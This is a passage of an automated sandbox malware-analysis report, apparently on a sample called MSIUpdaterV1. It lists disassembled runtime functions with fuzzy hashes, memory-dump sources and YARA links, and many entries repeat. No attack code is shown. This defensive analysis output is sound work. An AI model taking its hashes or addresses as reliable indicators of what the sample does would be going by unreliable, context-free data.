Opcode Fuzzy Hash: 1184c5013f3c34687d0ab32d57e9ac3577f0e81b73870b0b9f205e6913300ade
Instruction Fuzzy Hash: A2D179B5D00268AFCF19CFE8E8809ADBBB5FF09300F58452AE856E7751E730A951CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0011E351 Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0011E418
___AdjustPointer.LIBCMT ref: 0011E43B
___AdjustPointer.LIBCMT ref: 0011E4D7

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 71e17bc833f5ba4d231ace1e771c6c60a47e70cdc4b7d01532425611e03cb977
Instruction ID: 7a3e6cb3a559ca02b45d16be74238371201f4f9c9871a77be3015d288cadbb15
Opcode Fuzzy Hash: 71e17bc833f5ba4d231ace1e771c6c60a47e70cdc4b7d01532425611e03cb977
Instruction Fuzzy Hash: 88519C76A056069FDB2D8F90D881BFAB7E4EF54310F184539ED5587AA1E731ACC0CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0017B95F Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0017BA26
___AdjustPointer.LIBCMT ref: 0017BA49
___AdjustPointer.LIBCMT ref: 0017BAE5

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: b642506a3af89b7857b55ff547d025447a1098908d04743bf6940093b724cdc6
Instruction ID: 32533c132b08fee83666ee1254f0ff343c2ae28dea988b0810028c6558463972
Opcode Fuzzy Hash: b642506a3af89b7857b55ff547d025447a1098908d04743bf6940093b724cdc6
Instruction Fuzzy Hash: DE51E1766096069FDB29AF54D8C1BBA77B4EF50310F25C52DE90E47291E731EC40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0017B95F Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0017BA26
___AdjustPointer.LIBCMT ref: 0017BA49
___AdjustPointer.LIBCMT ref: 0017BAE5

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: b642506a3af89b7857b55ff547d025447a1098908d04743bf6940093b724cdc6
Instruction ID: 32533c132b08fee83666ee1254f0ff343c2ae28dea988b0810028c6558463972
Opcode Fuzzy Hash: b642506a3af89b7857b55ff547d025447a1098908d04743bf6940093b724cdc6
Instruction Fuzzy Hash: DE51E1766096069FDB29AF54D8C1BBA77B4EF50310F25C52DE90E47291E731EC40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0017B848 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0017B864
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0017B87D

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: f7eb209751748cdce88ac1562b5b6d178de3e76f6f0dbc9ddf680023b17a7993
Instruction ID: 1cba5bde517fb417db643e88742c49d15c5ca21e6e93cb7bd05779a63a5da780
Opcode Fuzzy Hash: f7eb209751748cdce88ac1562b5b6d178de3e76f6f0dbc9ddf680023b17a7993
Instruction Fuzzy Hash: 5301B53661D3155EA72466747CC9B662BA9EF227B6B30832EF529620F0EB114848A385

Uniqueness

Uniqueness Score: -1.00%

Function 0017B848 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0017B864
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0017B87D

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: f7eb209751748cdce88ac1562b5b6d178de3e76f6f0dbc9ddf680023b17a7993
Instruction ID: 1cba5bde517fb417db643e88742c49d15c5ca21e6e93cb7bd05779a63a5da780
Opcode Fuzzy Hash: f7eb209751748cdce88ac1562b5b6d178de3e76f6f0dbc9ddf680023b17a7993
Instruction Fuzzy Hash: 5301B53661D3155EA72466747CC9B662BA9EF227B6B30832EF529620F0EB114848A385

Uniqueness

Uniqueness Score: -1.00%

Function 00176B19 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00176B20
std::_Lockit::_Lockit.LIBCPMT ref: 00176B2B
std::_Lockit::~_Lockit.LIBCPMT ref: 00176B99

Part of subcall function 00176C7C: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00176C94

std::locale::_Setgloballocale.LIBCPMT ref: 00176B46

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
String ID:
API String ID: 677527491-0
Opcode ID: a3dd897ef8baab4f64458ea7d05447173ec12968e26ea38bf7f3abea541fdaf7
Instruction ID: 84fbc548b1911c70e2d41e44cd7c9a5a6f20a5e4790f0076b8934da349b070b6
Opcode Fuzzy Hash: a3dd897ef8baab4f64458ea7d05447173ec12968e26ea38bf7f3abea541fdaf7
Instruction Fuzzy Hash: 3A01DF75A00A20CFD706EF24D81597C7BB1FFA4790B088409E81967391DF74AE06EBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00176B19 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00176B20
std::_Lockit::_Lockit.LIBCPMT ref: 00176B2B
std::_Lockit::~_Lockit.LIBCPMT ref: 00176B99

Part of subcall function 00176C7C: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00176C94

std::locale::_Setgloballocale.LIBCPMT ref: 00176B46

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
String ID:
API String ID: 677527491-0
Opcode ID: a3dd897ef8baab4f64458ea7d05447173ec12968e26ea38bf7f3abea541fdaf7
Instruction ID: 84fbc548b1911c70e2d41e44cd7c9a5a6f20a5e4790f0076b8934da349b070b6
Opcode Fuzzy Hash: a3dd897ef8baab4f64458ea7d05447173ec12968e26ea38bf7f3abea541fdaf7
Instruction Fuzzy Hash: 3A01DF75A00A20CFD706EF24D81597C7BB1FFA4790B088409E81967391DF74AE06EBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00134D56 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,001337A1,00000000,00000001,00000000,00000000,?,0012AE13,00000000,00000000,00000000), ref: 00134D6D
GetLastError.KERNEL32(?,001337A1,00000000,00000001,00000000,00000000,?,0012AE13,00000000,00000000,00000000,00000000,00000000,?,0012B39A,00000000), ref: 00134D79

Part of subcall function 00134D3F: CloseHandle.KERNEL32(FFFFFFFE,00134D89,?,001337A1,00000000,00000001,00000000,00000000,?,0012AE13,00000000,00000000,00000000,00000000,00000000), ref: 00134D4F

___initconout.LIBCMT ref: 00134D89

Part of subcall function 00134D01: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00134D30,0013378E,00000000,?,0012AE13,00000000,00000000,00000000,00000000), ref: 00134D14

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,001337A1,00000000,00000001,00000000,00000000,?,0012AE13,00000000,00000000,00000000,00000000), ref: 00134D9E

Memory Dump Source

Source File: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 69f2fdf3436b39304644621d85fd3cecf797bdd5615407b58f54c58e61c6d1b7
Instruction ID: fd6d535b18f42e440d5255abd26597e8581a30cd3ec2daf28be709f7e37e4774
Opcode Fuzzy Hash: 69f2fdf3436b39304644621d85fd3cecf797bdd5615407b58f54c58e61c6d1b7
Instruction Fuzzy Hash: C8F0C936500118BBDF726FD5DC08E9A3F26FF1A3A1F544110FE1996970D73298A0DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001822EA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00182461

Strings

+, xrefs: 001823BF
-, xrefs: 001823B2

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: __aulldiv
String ID: +$-
API String ID: 3732870572-2137968064
Opcode ID: 3e85085a6ac7ce246e9b9e168e1b78d316f68e6bad7cb1b3142a0f0ecf7a4d71
Instruction ID: e61530d3adf5edd0d5d83174a1303937a47e29f51f5f1cf5d47d29a6411cd366
Opcode Fuzzy Hash: 3e85085a6ac7ce246e9b9e168e1b78d316f68e6bad7cb1b3142a0f0ecf7a4d71
Instruction Fuzzy Hash: 66A1D630A41258AFDF26EE78C8506EE7BB5EF59320F148559EC65DB291D334DB028F60

Uniqueness

Uniqueness Score: -1.00%

Function 001822EA Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00182461

Strings

+, xrefs: 001823BF
-, xrefs: 001823B2

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: __aulldiv
String ID: +$-
API String ID: 3732870572-2137968064
Opcode ID: 3e85085a6ac7ce246e9b9e168e1b78d316f68e6bad7cb1b3142a0f0ecf7a4d71
Instruction ID: e61530d3adf5edd0d5d83174a1303937a47e29f51f5f1cf5d47d29a6411cd366
Opcode Fuzzy Hash: 3e85085a6ac7ce246e9b9e168e1b78d316f68e6bad7cb1b3142a0f0ecf7a4d71
Instruction Fuzzy Hash: 66A1D630A41258AFDF26EE78C8506EE7BB5EF59320F148559EC65DB291D334DB028F60

Uniqueness

Uniqueness Score: -1.00%

Function 0014AF10 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 258COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0014B0F0
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0014B13E

Strings

., xrefs: 0014B110

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: ___std_fs_directory_iterator_advance@8
String ID: .
API String ID: 2610647541-248832578
Opcode ID: 7418e0e1384547442ea4a8b7ec76872519cb0adc0c24b9f66c5e9dd94d5ac3e6
Instruction ID: fccd096b69e06b67dfa69f72615d2de764d2d32f81d061a896f1db81698b52d1
Opcode Fuzzy Hash: 7418e0e1384547442ea4a8b7ec76872519cb0adc0c24b9f66c5e9dd94d5ac3e6
Instruction Fuzzy Hash: 5F911671A04626AFCB38DF28C8D0AAEB3B4FF05710F550259E825976A0D731ED55CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 0014AF10 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 258COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0014B0F0
___std_fs_directory_iterator_advance@8.LIBCPMT ref: 0014B13E

Strings

., xrefs: 0014B110

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: ___std_fs_directory_iterator_advance@8
String ID: .
API String ID: 2610647541-248832578
Opcode ID: 7418e0e1384547442ea4a8b7ec76872519cb0adc0c24b9f66c5e9dd94d5ac3e6
Instruction ID: fccd096b69e06b67dfa69f72615d2de764d2d32f81d061a896f1db81698b52d1
Opcode Fuzzy Hash: 7418e0e1384547442ea4a8b7ec76872519cb0adc0c24b9f66c5e9dd94d5ac3e6
Instruction Fuzzy Hash: 5F911671A04626AFCB38DF28C8D0AAEB3B4FF05710F550259E825976A0D731ED55CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 0022A870 Relevance: 5.4, Strings: 4, Instructions: 423COMMON

Download Yara Rule

Strings

@!29, xrefs: 0022ACDA
4oST, xrefs: 0022AB42
4oST, xrefs: 0022AD6C
|@], xrefs: 0022ACB4

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID:
String ID: 4oST$4oST$@!29$|@]
API String ID: 0-901387583
Opcode ID: 5780e21fd8d5802d3e1b3702b4d8c2ff62d560f7bc3f0af107ed2c93c40f1b01
Instruction ID: f000bdd5cc0a9c835d0f4a254bcec8d3ca3c9fc2ba2d84c026a416c1130d2a7a
Opcode Fuzzy Hash: 5780e21fd8d5802d3e1b3702b4d8c2ff62d560f7bc3f0af107ed2c93c40f1b01
Instruction Fuzzy Hash: 2622D1B4D002599FDB25CF98D981BEEBBB1BF08300F244199E909B7351D7306A81CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 0014B750 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0014B90C
___std_exception_destroy.LIBVCRUNTIME ref: 0014B922

Strings

(+V, xrefs: 0014B7A1

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: (+V
API String ID: 4194217158-1030211554
Opcode ID: bd72dc89a86a40be9318ed2475282cd25c1099ccb2ba7c176c60ff990578f9ad
Instruction ID: d40932ebf75e1b7e318d7b46a08cc08c11980fb9099c6640c78c3c9ff71d1d3f
Opcode Fuzzy Hash: bd72dc89a86a40be9318ed2475282cd25c1099ccb2ba7c176c60ff990578f9ad
Instruction Fuzzy Hash: F151E2B0C04649DFDB10DFA8C905B9EBBB4FF25714F144269E814AB2D2E7B45A44C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0014B750 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0014B90C
___std_exception_destroy.LIBVCRUNTIME ref: 0014B922

Strings

(+V, xrefs: 0014B7A1

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: (+V
API String ID: 4194217158-1030211554
Opcode ID: bd72dc89a86a40be9318ed2475282cd25c1099ccb2ba7c176c60ff990578f9ad
Instruction ID: d40932ebf75e1b7e318d7b46a08cc08c11980fb9099c6640c78c3c9ff71d1d3f
Opcode Fuzzy Hash: bd72dc89a86a40be9318ed2475282cd25c1099ccb2ba7c176c60ff990578f9ad
Instruction Fuzzy Hash: F151E2B0C04649DFDB10DFA8C905B9EBBB4FF25714F144269E814AB2D2E7B45A44C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0014BF10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0014C0AC
___std_exception_destroy.LIBVCRUNTIME ref: 0014C0C2

Strings

L1V, xrefs: 0014BF1D

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00110000, based on PE: true

Associated: 00000017.00000002.2896107926.0000000000110000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896136521.0000000000111000.00000020.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896173120.0000000000137000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.0000000000142000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896442647.00000000002DE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_110000_MSIUpdaterV1.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: L1V
API String ID: 4194217158-3264503493
Opcode ID: 84cdb04eb8571fc7ec0f321d69f8090a48353e34f9e819ce85125c0936fd32fd
Instruction ID: e1b9b6c1360d17ba0559ae48e61f4ee1fdb0b5d35d3742f4ad828708de05f8a7
Opcode Fuzzy Hash: 84cdb04eb8571fc7ec0f321d69f8090a48353e34f9e819ce85125c0936fd32fd
Instruction Fuzzy Hash: DF51DFB1C05248EBDB00DFA8D9457DEFBF4FB29704F204269E814A7391E7B55A48CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0014BF10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0014C0AC
___std_exception_destroy.LIBVCRUNTIME ref: 0014C0C2

Strings

L1V, xrefs: 0014BF1D

Memory Dump Source

Source File: 00000017.00000002.2896199963.0000000000145000.00000004.00000001.01000000.0000000B.sdmp, Offset: 00145000, based on PE: true

Associated: 00000017.00000002.2896199963.00000000002CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896199963.00000000002D2000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2896414440.00000000002DD000.00000040.00000001.01000000.0000000B.sdmpDownload File
